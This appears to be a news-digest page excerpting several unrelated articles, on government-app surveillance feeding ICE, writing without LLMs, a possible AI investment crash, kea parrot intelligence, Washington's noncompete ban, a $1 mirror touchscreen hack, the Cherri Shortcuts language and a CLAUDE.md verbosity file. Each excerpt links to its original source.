Photos submitted through CBP Home, biometric scans from Mobile Passport Control, and faces captured by Mobile Fortify all feed this system. And the EFF found that ICE does not allow people to opt out of being scanned, and agents can use a facial recognition match to determine your immigration status even when other evidence contradicts it. A U.S.-born citizen was told he could be deported based on a biometric match alone.
SmartLINK is the ICE electronic monitoring app, built by BI Incorporated, a subsidiary of the GEO Group (a private prison company that profits directly from how many people ICE monitors), under a $2.2 billion contract. The app collects geolocation, facial images, voice prints, medical information including pregnancy data, and phone numbers of your contacts. ICE’s contract gives them “unlimited rights to use, dispose of, or disclose” all data collected. The app’s former terms of service allowed sharing “virtually any information collected through the application, even beyond the scope of the monitoring plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these monitors to coordinate one of the largest immigration raids in history, arresting around 700 people across six cities in Mississippi.
And if you think your location data is safe because you use regular apps and avoid government ones, the federal government is buying that data too. Companies like Venntel collect 15 billion location points from over 250 million devices every day through SDKs embedded in over 80,000 apps (weather, navigation, coupons, games). DHS, FBI, DOD, and the DEA purchase this data without warrants, creating a constitutional loophole around the Supreme Court’s 2018 Carpenter v. United States ruling that requires a warrant for cellphone location history. The Defense Department even purchased location data from prayer apps to monitor Muslim communities. Police departments used similar data to track racial justice protesters.
And then there’s the IRS-ICE data sharing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding allowing ICE to receive names, addresses, and tax data for people with removal orders. ICE submitted 1.28 million names. The IRS erroneously shared the data of thousands of people who should never have been included. The acting IRS Commissioner, Melanie Krause, resigned in protest. The chief privacy officer quit. One person leaving changes nothing about the institution, and the data was already out the door. A federal judge blocked further sharing in November 2025, ruling it likely violates IRS confidentiality protections, but by then the IRS was already building an automated system to give ICE bulk access to home addresses with minimal human oversight. The court order is a speed bump, and they’ll find another route.
The apps, the databases, and the data broker contracts all feed the same pipeline, and no single agency controls it because they all share it.
The GAO reported in 2023 that nearly 60% of 236 privacy and security recommendations issued since 2010 had still not been implemented. Congress has been told twice, in 2013 and 2019, to pass comprehensive internet privacy legislation. It has done neither. And it won’t, because the surveillance apparatus serves the people who run it, and the people who run it write the laws. Oversight is theater. The GAO issues a report, Congress holds a hearing, everyone performs concern for the cameras, and then the contracts get renewed and the data keeps flowing. It’s working exactly as designed.
The federal government publishes content available through standard web protocols and RSS feeds, then wraps that content in applications that demand access to your location, biometrics, storage, contacts, and device identity. They embed advertising trackers in FBI apps. They sell the line that you need their app to receive their propaganda while the app quietly collects data that flows into the same surveillance pipeline feeding ICE raids and warrantless location tracking. Every single one of these apps could be replaced by a web page, and they know that. The app exists because a web page can’t read your fingerprint, track your GPS in the background, or inventory the other accounts on your device.
You don’t need their app. You don’t need their permission to access public information. You already have a browser, an RSS reader, and the ability to decide for yourself what runs on your own hardware. Use them.
...
Read the original on www.sambent.com »
Don’t Let AI Write For You

When you write a document or essay, you are posing a question and then answering it. For example, a PRD answers the question, “What should we build?” A technical spec answers, “How should we build it?” Sometimes the question is more difficult to answer—“What are we even trying to accomplish?” And with every attempt at answering, you reflect on whether you’re asking the right question.
But now, of course, we have LLMs. I’m seeing an increasing amount of LLM-generated documents, articles, and essays. I want to caution against this. Each LLM-generated document is a missed opportunity to think and build trust.
The goal of writing is not to have written. It is to have increased your understanding, and then the understanding of those around you. When you are tasked to write something, your job is to go into the murkiness and come out of it with structure and understanding. To conquer the unknown.
The second order goal of writing is to become more capable. It is like working out. Every time you do a rep on the boundary of what you can do, you get stronger. It is uncomfortable and effortful.
Letting an LLM write for you is like paying somebody to work out for you.
There are social effects to LLM-generated writing too. When I send somebody a document that whiffs of LLM, I’m only demonstrating that the LLM produced something approximating what others want to hear. I’m not showing that I contended with the ideas.
It undermines my credibility as a person who could lead whatever initiative comes out of this document. That’s unfortunate. I could have used this opportunity to establish credibility.
LLM-generated writing undermines the authenticity of not just one’s writing but of the thinking behind it as well. If the prose is automatically generated, might the ideas be too?
How LLMs can be used in the writing process
LLMs are useful for research and checking your work. They can also work well for quickly recording information or transcribing text (neither of which are what I mean by “writing”, as in “writing an essay”).
They are particularly good at generating ideas. They thrive in this use case because if they generate 10 things and only one is useful, no harm is done. You can take what is useful and leave the rest behind.
These LLMs will increase efficiency in delivering software. But in order to make the most of them, we need a simultaneous rise in our level of thoughtfulness.
...
Read the original on alexhwoods.com »
The catalysts for a crash are already laid out, and it can happen sooner than most expect. AI is here to stay. If used right, chances are it will make us all more productive. That, on the other hand, does not mean it will be a good investment.
Magnificent 7 companies are increasing capex to their biggest ever to differentiate their tech from each other and the big AI labs, but the key realization is that they don’t have to spend it to win. It’s a defensive move for them, if they commit $50B, OpenAI and Anthropic need to go raise $100B each to stay competitive, which makes them reliant on investors’ money. As the numbers get bigger, the amount of funds that can write checks of the size required to fill such amounts gets smaller. And many of them are now getting bombed in the Gulf.
This is the reason there’s a push for IPOs, it’s because it’s the only option left to keep the funding coming.
Taking this into account, Google is extremely well positioned to weather the storm. When they announce capex, they don’t spend it overnight. They can simply deploy month by month until their competitors struggle to raise and are forced to capitulate. At that point they can just ramp down the spending and declare victory in a cornered market. They don’t need the capex; they just need to make it very clear to everyone that nobody can outspend them. It is hard to picture as the numbers get so big, but Alphabet (Google’s parent) is ten times more valuable than the biggest military company.
This also has a great implication for the Mag 7, especially Google: their capex will be a lot smaller in practice than projected, and as investors hate to see high capex in tech, the market will probably reward that if it materializes.
Apple didn’t even have to pretend, their strategy of waiting on the sidelines, while selling Mac Minis, for someone to come up with a good-enough model and just buy that when it’s done seems to be working. They may not even do that, they are now hinting at charging models for being available on Siri. Amazon is hedged with an Anthropic investment, and Meta is spending like there’s no tomorrow.
We’re hitting the worst-case scenarios for the big AI labs: energy, their biggest expense, is at multi-year highs, capital from the Gulf is not available for obvious reasons, there are serious concerns about a rate hike, and RAM prices are crashing because new models won’t need as much, but labs already bought them at sky-high prices. And that last innovation came from their biggest competitor, Google.
Anthropic is already pushing to reduce costs and increase revenue. If investor money dries up, they will be forced to cut their losses and pass the true costs on to their users. The question now is whether customers will be willing to pay up. Independent reports state that Claude’s metered models are priced 5x higher than what subscribers pay, and nobody is sure whether even the metered pricing is profitable. In investing, stories are far more exciting than reality: a company losing money but growing like crazy is an easier sell than a huge company losing money or operating on tight margins. Raising prices will certainly decrease demand, and that risks killing the growth story. And even if revenue keeps growing, it doesn’t matter if there are no margins: growing revenue without profits just means burning cash faster, especially when competing against companies that can offer the same product as a loss leader bundled into their cloud platforms.
It’s also worth mentioning that Claude’s most expensive subscription plans (Max 5x and Max 20x, priced at $100 and $200 per month respectively) do not allow for yearly payments, hinting that prices will go up.
OpenAI is struggling to monetize. They turned to showing ads in ChatGPT, something Sam Altman once called a “last resort”, while Anthropic is crushing them with the more profitable corporate customers and software engineers. Their shopping feature flopped and they shut down Sora, both supposed to be revenue drivers.
I wouldn’t be surprised at all if in the next couple of quarters we see OpenAI looking for an exit. It will be interesting because the sizes are now so big that we will probably know all the details. The most likely buyer is Microsoft, they already own a lot of it, and because of that, they are the most interested in showing a win. Sam Altman managed to get Microsoft so involved in OpenAI that making sure it lands on its feet is a Microsoft problem to solve. But, would shareholders vote to spend 22% of an established company’s market cap to rescue a money-burning AI lab that has lost most of its differentiators?
And independent of whether Microsoft makes money or not in their OpenAI endeavor, it kills the story: they were betting the whole growth story on AI, and if that doesn’t work out, then what’s left to justify a high stock price? They lose a big customer for their cloud services. Even worse considering that now, using the AI they helped fund, everyone can compete with their sub-par products. GitHub is a good candidate for disruption, and that’d be just the start.
You may think that you’re not affected by the big labs struggling. Hell, you may even be happy that they won’t be replacing your job after all. But that is far from reality.
Investments are now so big that writing them off would certainly hurt public companies’ balance sheets, and their growth prospects. This will drag the whole market, reducing valuations and slowing M&A, which further dries up VC money and slows down investments. Just like it happened in 2022.
And this has even more ramifications: pension funds around the world will take a hit. Datacenters that were built with the expectation of growth will sit under capacity, because training is the most compute-intensive part of building a model, and if there’s no capital to train new ones, that capacity won’t be needed. GPUs then sit idle while their value declines as demand disappears. Some committed GPUs may never get delivered, or even manufactured. Investment drying up would be a disaster for Nvidia, now the biggest company in the world.
It could also happen that datacenters are not underused, but instead have to charge their customers a far lower rate than they projected before building, so everyone benefits from AI except them.
Building a datacenter is supposed to be a “safe” investment in normal times, so banks give private credit and mortgages to finance them. A write-off of those assets means that banks start realizing losses, hurting their capacity to loan, and some may even be forced to liquidate, just like we saw in 2023. And all this assumes we don’t get disruptions in manufacturing in Taiwan or global supply chains.
Of course, the content of this article is highly speculative; it may turn out that demand for models is so high it offsets every other problem I lay out here. But almost all innovations go through a boom and bust cycle, and I don’t see a reason this one is an exception.
Thanks to Javier Silveira and Augusto Gesualdi for reviewing drafts of this post.
...
Read the original on martinvol.pe »
I was doomscrolling Reddit at 1am (as you do) and someone had posted a video from the New Zealand Transport Agency. Road workers near a tunnel by Milford Sound kept finding their traffic cones in weird places. Dragged into the road, rearranged, sometimes actively rerouting traffic. Nobody could figure out what was going on, so they checked the cameras.
Kea. Native to New Zealand, these big parrots are usually seen on the route to Milford Sound harassing tourists. A flock of them is officially called a “circus” or a “curiosity” — whoever named them clearly met one. The footage showed them just… casually shoving cones around a construction site. But here’s the insane bit — workers said the kea would listen for cars coming through the tunnel BEFORE moving the cones, timing it so the cars would have to stop. Why? Because stopped cars mean humans getting out. Humans getting out means food.
These birds are smarter than some adults I know. Move cone → car stops → human gets out → human feeds me. They independently invented toll booths.
The transport agency’s solution was equally funny. They switched to heavier cones the birds couldn’t move, and then — I’m not making this up — they built “kea gyms” by the roadside. Puzzle stations and contraptions to keep them entertained. A government agency literally built a playground for parrots because they were too smart for traffic management. Honestly, I’m fine with my tax dollars going to this.
Obviously now I had to know — is this the smartest bird in the world? And hold on, how do you actually measure how smart a bird is? So I whipped out ChatGPT and Google Scholar and here’s what I learned.
How do you give an IQ test to a bird?
Turns out there’s no single test — researchers have come up with a bunch of different experiments over the years, each designed to measure a different type of intelligence. Some of these I’d fail too tbh.
First up, the mirror test. You stick a coloured mark on a bird somewhere it can only see in a mirror. If it looks at the mirror and then tries to remove the mark from its own body, it recognises that the reflection is itself. That’s self-awareness. Most animals completely fail this — dogs fail it, cats fail it. Eurasian magpies pass it. One of the very few non-mammals to do so. Your local magpie has a stronger sense of self than your golden retriever. Pretty humbling for the dog.
Then there’s a cool one called Aesop’s Fable — my favourite. It’s literally named after the fable where a thirsty crow drops stones into a pitcher to raise the water level. Researchers put food floating in a narrow tube of water that the bird can’t reach. The question is whether it’ll figure out to drop objects in to raise the water level and get the food. Rooks, New Caledonian crows, and Eurasian jays all pass. Some of them even figure out that heavy objects sink (useful) while light objects float (useless). A fable from 600 BC and it turns out Aesop was just reporting the news.
Next, the delayed gratification test. The marshmallow test, but for birds. Offer an OK snack now, or a much better snack if they wait. Ravens pick the better future reward over 70% of the time. They’ll even choose a tool they’ll need later over an immediate food reward. That’s more self-control than I have around a bowl of chips.
There’s also vocal mimicry and communication, which goes way beyond “Polly wants a cracker.” Dr. Irene Pepperberg studied an African grey parrot named Alex for 30 years. Alex could identify objects, colours, shapes, and numbers. He understood abstract concepts like “same” and “different.” His vocabulary exceeded 100 words. When he died in 2007, his last words to Pepperberg were reportedly “You be good. I love you. See you tomorrow.” I don’t care how you define intelligence — that one’s hard to brush off.
And finally, spatial memory. Clark’s nutcrackers cache up to 33,000 seeds across thousands of locations each autumn — and remember where most of them are months later. I lose my keys in a two-bedroom apartment.
Here’s the wild part. A 2016 study in PNAS found that parrots and songbirds pack roughly twice as many neurons into their forebrains as primate brains of the same mass. The neurons are just much smaller and more densely packed. A crow’s brain weighs about 10 grams. A chimpanzee’s weighs about 400 grams. And yet corvids demonstrate cognitive abilities that rival great apes: tool use, planning, and social reasoning.
Orange = birds, grey = mammals. Dashed lines show trend. Birds sit far above the mammal curve.
A macaw’s brain weighs 20 grams and has roughly the same number of forebrain neurons as a macaque monkey’s brain at 70 grams. Ounce for ounce, bird brains are some of the most computationally dense organs in the animal kingdom. Calling someone a “bird brain” is honestly more of a compliment.
Ok so who’s the smartest?
There’s no definitive answer because different species dominate different areas. But after going through all of this, if you made me rank them, I’d probably go:
Evil genius tier: Corvids (crows, ravens, magpies, jays). The tool users. New Caledonian crows are probably the standout — they craft hooks from sticks to pull grubs out of crevices, something we thought only primates could do. Ravens plan for the future. Magpies recognise themselves in mirrors. Jays hide food and then re-hide it if they think another bird was watching. That last one is wild — it means they can model what another bird knows. They’re paranoid in a way that requires theory of mind.
Con artist tier: Parrots (African greys, kea, cockatoos). The communicators and schemers. Alex the African grey is the poster child, but kea might be the most broadly impressive. A University of Auckland study found kea can judge statistical probabilities — something previously demonstrated only in human infants and great apes. In other tests at Canterbury University, kea outscored gibbons. Actual primates. Goffin’s cockatoos can unlock a sequence of five different locks in the right order to reach a reward. Each lock has a different mechanism. Worthwhile contenders for a spot in Ocean’s Fourteen if they ever make one.
Quietly competent tier: Songbirds. Clark’s nutcrackers, chickadees, and a handful of others. They won’t pick your locks or craft tools, but they’ll memorise 33,000 seed locations and find them nine months later under snow. The accountants of the bird world.
Honestly, corvids and parrots are neck and neck. Corvids edge ahead on tool use and physical problem solving. Parrots are ahead on communication and social cognition. Both would absolutely destroy your average pigeon in a pub quiz.
I also had to look up the dumbest bird. You might guess it’s a turkey — and they do have a reputation for being dim, mostly because domestic turkeys have been selectively bred to be so heavy they can’t fly and so docile they just stand around. Wild turkeys are actually pretty sharp. But no, the real answer is the kakapo — which is also a New Zealand parrot, funnily enough. The kakapo evolved with no natural predators, so when it encounters a threat it just… freezes. Stands completely still and hopes for the best. The males also have a mating call so confusing that the females often can’t figure out where the sound is coming from. Between that and the freezing thing, there are fewer than 200 left. The kea got all the brains in the New Zealand parrot family.
What I took away from this
We default to thinking intelligence scales with brain size, that it’s a mammal thing, that it correlates with being “higher” on some imaginary evolutionary ladder. Turns out it’s about neuron density and architecture, not mass. A 10 gram raven brain running 1.2 billion neurons is doing more per gram than almost anything else in nature.
Anyway. Next time someone calls you a bird brain, just say thank you.
Disclaimer: Thoughts are my own and do not represent any other parties.
...
Read the original on dhanishsemar.com »
The measure, spearheaded by state Rep. Liz Berry (D-Seattle), outlaws noncompete agreements: in general, contracts that let employers forbid workers from creating or joining a competing business for a set amount of time.
Industries that utilize noncompete agreements, otherwise known as restrictive covenants, include technology, health care, finance and sales. The law, signed Monday, takes effect on June 30, 2027.
“Washington state is standing up for workers,” Berry said in a news release published Wednesday. “If you want to take a new job with better pay or leave to start your own company, your old job shouldn’t be able to block you from pursuing your dream.”
On the effective date, restrictive covenants will be unenforceable for all Washington-based workers and businesses, according to the new law. New noncompete agreements are illegal. Employers must notify current and former workers in writing about any voided noncompete agreements by Oct. 1, 2027.
The measure furthers a state law from 2019 that limited noncompete agreements to employees who earned more than about $126,859 and contractors who made more than around $317,147, according to the 2026 earnings thresholds posted by the Washington State Department of Labor and Industries.
The state’s latest approach echoes a decision made in 2024 under former President Joe Biden’s administration to prohibit noncompete agreements across the U.S. However, the Federal Trade Commission rolled back the ban this year.
“After the Non-Compete Rule was issued, several employers and trade groups filed lawsuits challenging it,” the agency wrote in a rule published in February. “Federal district courts in three jurisdictions issued opinions in lawsuits challenging the Non-Compete Rule.”
In Washington, the new law also clarifies nonsolicitation agreements, which bar former workers from courting clients and co-workers at their past workplaces.
Nonsolicitation agreements are not the same as noncompete agreements, and they are not prohibited. “However, the definition of (the) nonsolicitation agreement must be narrowly construed,” per the law.
Locally, attorneys are providing guidance to workplaces about the new measure.
“Washington now joins a small but growing number of states that have declared non-competition covenants void and unenforceable,” Alex Cates, senior counsel at law firm Holland and Knight, wrote in an advisory Tuesday. “This is a major change.”
States with full noncompete bans include California, North Dakota, Minnesota and Oklahoma, per the Economic Innovation Group, a bipartisan public policy organization.
...
Read the original on www.seattletimes.com »
We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin, Guillermo, and Logan in about 16 hours.
The basic principle behind Sistine is simple. Surfaces viewed from an angle tend to look shiny, and you can tell if a finger is touching the surface by checking if it’s touching its own reflection.
Kevin, back in middle school, noticed this phenomenon and built ShinyTouch, utilizing an external webcam to build a touch input system requiring virtually no setup. We wanted to see if we could miniaturize the idea and make it work without an external webcam. Our idea was to retrofit a small mirror in front of a MacBook’s built-in webcam, so that the webcam would be looking down at the computer screen at a sharp angle. The camera would be able to see fingers hovering over or touching the screen, and we’d be able to translate the video feed into touch events using computer vision.
Our hardware setup was simple. All we needed was to position a mirror at the appropriate angle in front of the webcam. Here is our bill of materials:
After some iteration, we settled on a design that could be assembled in minutes using a knife and a hot glue gun.
The first step in processing video frames is detecting the finger. Here’s a typical example of what the webcam sees:
The finger detection algorithm needs to find the touch/hover point for further processing. Our current approach uses classical computer vision techniques. The processing pipeline consists of the following steps:
1. Find the two largest contours and ensure that the contours overlap in the horizontal direction and the smaller one is above the larger one
2. Identify the touch/hover point as the midpoint of the line connecting the top of the bottom contour and the bottom of the top contour
3. Distinguish between touch and hover based on the vertical distance between the two contours
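The geometric checks in these three steps can be sketched in plain Python. The helper below assumes the two largest contours have already been extracted (e.g. via OpenCV's `findContours` plus `boundingRect`) and operates on their bounding boxes; the `touch_threshold` value is an illustrative guess, not Sistine's actual tuning.

```python
def touch_from_contour_boxes(box_a, box_b, touch_threshold=12):
    """Each box is (x, y, w, h) in image coordinates (y grows downward).
    Returns ((x, y), is_touch) for a valid finger/reflection pair,
    or None if the pair fails the geometric checks."""
    # Order the boxes vertically: `top` is the upper one.
    top, bottom = sorted((box_a, box_b), key=lambda b: b[1])
    # Step 1a: the smaller box must be the upper one (finger above reflection).
    if top[2] * top[3] > bottom[2] * bottom[3]:
        return None
    # Step 1b: the boxes must overlap in the horizontal direction.
    if top[0] + top[2] < bottom[0] or bottom[0] + bottom[2] < top[0]:
        return None
    # Step 2: touch/hover point = midpoint between the bottom edge of
    # the top box and the top edge of the bottom box.
    x = (top[0] + top[2] // 2 + bottom[0] + bottom[2] // 2) // 2
    y = (top[1] + top[3] + bottom[1]) // 2
    # Step 3: a small vertical gap means the finger meets its reflection.
    gap = bottom[1] - (top[1] + top[3])
    return (x, y), gap <= touch_threshold
```

This skips the thresholding that produces the binary mask in the first place; it only illustrates the contour-pair logic.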
Shown above is the result of applying this process to a frame from the webcam. The finger and reflection (contours) are outlined in green, the bounding box is shown in red, and the touch point is shown in magenta.
The final step in processing the input is mapping the touch/hover point from webcam coordinates to on-screen coordinates. The two are related by a homography. We compute the homography matrix through a calibration process where the user is prompted to touch specific points on the screen. After we collect data matching webcam coordinates with on-screen coordinates, we can estimate the homography robustly using RANSAC. This gives us a projection matrix that maps webcam coordinates to on-screen coordinates.
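To make the mapping step concrete: a homography is a 3x3 matrix estimated from point correspondences. The minimal direct-linear-transform version below (plain NumPy, no outlier rejection) shows the idea; Sistine's actual pipeline uses a RANSAC-based estimator, as in OpenCV's `findHomography`, to tolerate bad calibration samples.

```python
import numpy as np

def estimate_homography(src, dst):
    """Direct Linear Transform: each correspondence (x, y) -> (u, v)
    contributes two rows to a homogeneous system A h = 0."""
    A = []
    for (x, y), (u, v) in zip(src, dst):
        A.append([-x, -y, -1, 0, 0, 0, u * x, u * y, u])
        A.append([0, 0, 0, -x, -y, -1, v * x, v * y, v])
    # The solution is the right singular vector belonging to the
    # smallest singular value, reshaped into a 3x3 matrix.
    _, _, Vt = np.linalg.svd(np.asarray(A, dtype=float))
    H = Vt[-1].reshape(3, 3)
    return H / H[2, 2]  # normalize scale

def apply_homography(H, point):
    """Map a webcam-coordinate point to screen coordinates."""
    x, y, w = H @ np.array([point[0], point[1], 1.0])
    return x / w, y / w
```

Four non-degenerate correspondences determine the matrix; calibration collects more than that so a robust estimator can discard mistouched samples.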
The video above demonstrates the calibration process, where the user has to follow a green dot around the screen. The video includes some debug information, overlaid on live video from the webcam. The touch point in webcam coordinates is shown in magenta. After the calibration process is complete, the projection matrix is visualized with red lines, and the software switches to a mode where the estimated touch point is shown as a blue dot.
In the current prototype, we translate hover and touch into mouse events, making existing applications instantly touch-enabled.
If we were writing our own touch-enabled apps, we could directly make use of touch data, including information such as hover height.
Project Sistine is a proof-of-concept that turns a laptop into a touchscreen using only $1 of hardware, and for a prototype, it works pretty well! With some simple modifications such as a higher resolution webcam (ours was 480p) and a curved mirror that allows the webcam to capture the entire screen, Sistine could become a practical low-cost touchscreen system.
Our Sistine prototype is open source, released under the MIT License.
...
Read the original on anishathalye.com »
Cherri (pronounced cherry) is a Shortcuts programming language that compiles directly to a valid runnable Shortcut.
The primary goal is to make it practical to create large Shortcut projects (within the limitations of Shortcuts) and maintain them long term.
* 🎓 Easy to learn and syntax similar to other languages
* 🐞 1-1 translation to Shortcut actions as much as possible to make debugging easier
* 🥾 Half-bootstrapped: Most actions and types are written in the language
* 📦 Package manager: Remote Git repo-based package manager built in, allowing for automatic inclusion and updates.
* 🪶 Optimized to create as small as possible Shortcuts and reduce memory usage at runtime
* #️⃣ Include files within others for large Shortcut projects
* 🔄 Define functions to run within their own scope at the top of your Shortcut to reduce duplicate actions.
* 🔀 Convert Shortcuts from an iCloud link with the --import= option
* 🔏 Signs using macOS, falls back on HubSign or another server that uses scaxyz/shortcut-signing-server.
You can install Cherri by downloading the latest release or via the Homebrew or Nix package managers:
If you have Homebrew installed, you can run:
brew tap electrikmilk/cherri
brew install electrikmilk/cherri/cherri
If you have Nix installed, you can run:
nix profile install github:electrikmilk/cherri
Alternatively, you can use nix-direnv to get an isolated, effortless dev environment where cherri is available based on which directory you’re in. Then you would use_flake and add Cherri to flake.nix:
inputs.cherri.url = "github:electrikmilk/cherri";
{ # outputs.packages.${system}.default = pkgs.mkShell etc - omitted for brevity
  buildInputs = [
    inputs.cherri.packages.${system}.cherri
  ];
}
Then run direnv allow in the directory with the flake.nix file.
cherri file.cherri
Run cherri without any arguments to see all options and usage. For development, use the --debug (or -d) option to print stack traces, debug information, and output a .plist file.
Some languages have been abandoned, don’t work well, or no longer work. I don’t want Shortcuts languages to die. There should be more, not fewer.
Plus, some stability comes with this project being on macOS and not iOS, and I’m not aware of another Shortcuts language with macOS as its platform other than Buttermilk.
The original Workflow app assigned a code name to each release. Cherri is named after the second-to-last update “Cherries” (also cherry is one of my favorite flavors).
...
Read the original on github.com »
One file. Drop it in your project. Cuts Claude output verbosity by ~63%. No code changes required.

Note: most Claude costs come from input tokens, not output. This file targets output behavior - sycophancy, verbosity, formatting noise. It won’t fix your biggest bill but it will fix your most annoying responses.

Model support: benchmarks were run on Claude only. The rules are model-agnostic and should work on any model that reads context - but results on local models like llama.cpp, Mistral, or others are untested. Community results welcome.
When you use Claude Code, every word Claude generates costs tokens. Most people never control how Claude responds - they just get whatever the model decides to output.
* Opens every response with “Sure!”, “Great question!”, “Absolutely!”
* Ends with “I hope this helps! Let me know if you need anything!”
* Restates your question before answering it
* Adds unsolicited suggestions beyond what you asked
* Over-engineers code with abstractions you never requested
All of this wastes tokens. None of it adds value.
Drop CLAUDE.md into your project root. Claude Code reads it automatically. Behavior changes immediately.
This file works best for:
* Repeated structured tasks where Claude’s default verbosity compounds across hundreds of calls
* Teams who need consistent, parseable output format across sessions
This file is not worth it for:
* Single short queries - the file loads into context on every message, so on low-output exchanges it is a net token increase
* Casual one-off use - the overhead doesn’t pay off at low volume
* Fixing deep failure modes like hallucinated implementations or architectural drift - those require hooks, gates, and mechanical enforcement
* Pipelines using multiple fresh sessions per task - fresh sessions don’t carry the CLAUDE.md overhead benefit the same way persistent sessions do
* Parser reliability at scale - if you need guaranteed parseable output, use structured outputs (JSON mode, tool use with schemas) built into the API - that is a more robust solution than prompt-based formatting rules
* Exploratory or architectural work where debate, pushback, and alternatives are the point - the override rule lets you ask for that any time, but if that’s your primary workflow this file will feel restrictive
The honest trade-off:
The CLAUDE.md file itself consumes input tokens on every message. The savings come from reduced output tokens. The net is only positive when output volume is high enough to offset the persistent input cost. At low usage it costs more than it saves.
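That trade-off can be made concrete with back-of-the-envelope arithmetic. The sketch below is illustrative only: the token counts and per-token prices in the example call are hypothetical placeholders, not measured values or actual pricing.

```python
def net_savings(messages, file_tokens, output_saved_per_msg,
                input_price, output_price):
    """Rough net saving for a session: positive means the rules file
    pays for itself, negative means it costs more than it saves."""
    # Cost added: the CLAUDE.md file rides along as input on every message.
    added = messages * file_tokens * input_price
    # Cost saved: each response is shorter by roughly output_saved_per_msg.
    saved = messages * output_saved_per_msg * output_price
    return saved - added

# Hypothetical numbers: a 10-message session, a 100-token rules file,
# ~200 output tokens saved per response, output priced 5x input.
print(net_savings(10, 100, 200, 1, 5))
```

Since both terms scale linearly with message count, the sign depends only on the per-message comparison: the file wins whenever output_saved_per_msg * output_price exceeds file_tokens * input_price.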
Same 5 prompts. Run without CLAUDE.md (baseline) then with CLAUDE.md (optimized).
~384 output tokens saved per 4 prompts. Same information. Zero signal loss.
Methodology note: This is a 5-prompt directional indicator, not a statistically controlled study. Claude’s output length varies naturally between identical prompts. No variance controls or repeated runs were applied. Treat the 63% as a directional signal for output-heavy use cases, not a precise universal measurement. The CLAUDE.md file itself adds input tokens on every message - net savings only apply when output volume is high enough to offset that persistent cost.
Scope rules to your actual failure modes, not generic ones.
Generic rules like “be concise” help but the real wins come from targeting specific failures you’ve actually hit. For example if Claude silently swallows errors in your pipeline, add a rule like: “when a step fails, stop immediately and report the full error with traceback before attempting any fix.” Specific beats generic every time.
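For instance, a project-level CLAUDE.md targeting specific failure modes might look like the following. These rules are hypothetical, written for illustration; tailor them to failures you have actually observed.

```markdown
# Project rules

- When a pipeline step fails, stop immediately and report the full
  error with traceback before attempting any fix.
- Never modify files under /config without asking for confirmation.
- Answer directly: no greeting, no restating the question, no
  closing offer of further help.
```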
CLAUDE.md files compose - use that.
Claude reads multiple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), project-level, and subdirectory-level. This means:
* Keep general preferences (tone, format, ASCII rules) in your global file
* Keep project-specific constraints (“never modify /config without confirmation”) at the project level
This avoids bloating any single file and keeps rules close to where they apply.
Different project types need different levels of compression. Pick the base file + a profile, or use the base alone.
Option 1 - curl:
curl -o CLAUDE.md https://raw.githubusercontent.com/drona23/claude-token-efficient/main/CLAUDE.md
Option 2 - clone the repo:
git clone https://github.com/drona23/claude-token-efficient
cp claude-token-efficient/profiles/CLAUDE.coding.md your-project/CLAUDE.md
Option 3 - Manual:
Copy the contents of CLAUDE.md from this repo into your project root.
User instructions always win. If you explicitly ask for a detailed explanation or verbose output, Claude will follow your instruction - the file never fights you.
Found a behavior that CLAUDE.md can fix? Open an issue with:
* The annoying behavior (what Claude does by default)
* The prompt that triggers it
Community submissions become part of the next version with full credit.
This project was built on real complaints from the Claude community. Full credit to every source that contributed a fix:
MIT - free to use, modify, and distribute.
Built by Drona Gangarapu - open to PRs, issues, and profile contributions.
...
Read the original on github.com »